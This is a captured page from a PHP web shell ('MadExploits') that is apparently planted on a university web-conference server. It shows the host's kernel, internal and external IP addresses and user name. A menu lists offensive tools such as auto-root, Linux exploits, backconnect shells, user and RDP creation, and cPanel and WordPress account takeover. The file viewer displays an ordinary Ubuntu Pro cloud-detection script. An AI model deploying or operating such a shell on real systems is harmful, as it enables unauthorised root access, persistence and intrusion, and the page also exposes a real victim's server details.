Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.15.192.89
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
uaclient /
clouds /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
990
B
-rw-r--r--
aws.py
4.19
KB
-rw-r--r--
azure.py
2.84
KB
-rw-r--r--
gcp.py
4.07
KB
-rw-r--r--
identity.py
3.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : azure.py
import logging import os from typing import Any, Dict from uaclient import exceptions, http, secret_manager, system, util from uaclient.clouds import AutoAttachCloudInstance LOG = logging.getLogger(util.replace_top_level_logger_name(__name__)) IMDS_BASE_URL = "http://169.254.169.254/metadata/" API_VERSION = "2020-09-01" # Needed to get subscription ID in attested data IMDS_URLS = { "pkcs7": IMDS_BASE_URL + "attested/document?api-version=" + API_VERSION, "compute": IMDS_BASE_URL + "instance/compute?api-version=" + API_VERSION, } DMI_CHASSIS_ASSET_TAG = "/sys/class/dmi/id/chassis_asset_tag" AZURE_OVF_ENV_FILE = "/var/lib/cloud/seed/azure/ovf-env.xml" AZURE_CHASSIS_ASSET_TAG = "7783-7084-3265-9085-8269-3286-77" AZURE_PRO_LICENSE_TYPE = "UBUNTU_PRO" class UAAutoAttachAzureInstance(AutoAttachCloudInstance): # mypy does not handle @property around inner decorators # https://github.com/python/mypy/issues/1362 @property # type: ignore @util.retry(exceptions.CloudMetadataError, retry_sleeps=[1, 1, 1]) def identity_doc(self) -> Dict[str, Any]: responses = {} for key, url in sorted(IMDS_URLS.items()): response = http.readurl( url, headers={"Metadata": "true"}, timeout=1 ) if response.code != 200: raise exceptions.CloudMetadataError( code=response.code, body=response.body ) if key == "pkcs7": signature = response.json_dict["signature"] responses[key] = signature secret_manager.secrets.add_secret(signature) else: responses[key] = response.json_dict return responses @property def cloud_type(self) -> str: return "azure" @property def is_viable(self) -> bool: """This machine is a viable AzureInstance""" if os.path.exists(DMI_CHASSIS_ASSET_TAG): chassis_asset_tag = system.load_file(DMI_CHASSIS_ASSET_TAG) if AZURE_CHASSIS_ASSET_TAG == chassis_asset_tag.strip(): return True return os.path.exists(AZURE_OVF_ENV_FILE) def should_poll_for_pro_license(self) -> bool: # Azure will make sure it is on all supported versions return True def is_pro_license_present(self, *, wait_for_change: bool) -> bool: if wait_for_change: raise exceptions.CancelProLicensePolling() url = IMDS_URLS.get("compute", "") try: response = http.readurl(url, headers={"Metadata": "true"}) except OSError as e: LOG.error(e) raise exceptions.CancelProLicensePolling() if response.code != 200: LOG.error(response.body) raise exceptions.CancelProLicensePolling() return response.json_dict.get("licenseType") == AZURE_PRO_LICENSE_TYPE
Close